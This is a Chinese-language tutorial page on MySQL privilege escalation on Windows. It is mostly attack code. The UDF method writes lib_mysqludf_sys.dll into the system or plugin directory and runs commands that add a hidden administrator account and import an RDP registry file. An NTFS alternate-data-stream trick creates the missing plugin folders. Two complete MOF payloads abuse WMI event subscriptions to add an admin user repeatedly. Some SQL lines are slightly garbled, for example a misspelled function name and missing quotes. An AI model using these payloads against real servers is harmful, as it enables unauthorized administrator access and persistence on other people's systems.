首页 > 代码库 > MySQL提权

MySQL提权

1、利用sqlmap的UDF提权

  1.找个可写的目录上传lib_mysqludf_sys.dll,根据mysql的版本导入到windows\system32或者mysql的\lib\plugin目录下

select @@plugin_dir

 

select load_flie(C:\\RECYCLER\\lib_mysqludf_sys.dll) into dumpfile C:\\windows\\system32\\lib_mysqludf_sys.dll

 

 

  2.创建函数执行命令

create function cmd returns string soname lib_mysqludf_sys.dll;select cmd(net user mrxt 123456 /add);select cmd(net localgroup administrators mrxt /add);select cmd(regedit /s C:\\3389.reg);    drop function cmd;delete from mysql.func where name=cmd

 

  

  3.某些情况下遇到Can‘t open shared library的情况,需要把DLL导出到lib\plugin目录下才可以,如果不存在,则可以用NTFS ADS流来创建文件夹的方法

select dll file into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION;//创建lib目录select dll file into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION;//创建plugin目录

 

  

2.MOF提权

找个可写目录上传MOF文件,比如C:\RECYCLER\

这个payload利用的是WScript.Shell

#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa \"Win32_LocalTime\" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{    Name = "consPCSV2";    ScriptingEngine = "JScript";    ScriptText =    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";};instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

 

这个payload利用的是User.Shell

#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa \"Win32_LocalTime\" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";};instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

 

然后导出到c:/windows/system32/wbem/mof/目录下

select load_file(C:\\wmpub\\nullevt.mof) into dumpfile c:\\windows\\system32\\wbem\\mof\\nullevt.mof

 

这个方法会不停的添加用户,执行net stop winmgmt 然后删除文件即可

 

 

参考文章:

http://www.waitalone.cn/mysql-tiquan-summary.html

http://zone.wooyun.org/content/1795

http://www.exploit-db.com/exploits/23083/

 

MySQL提权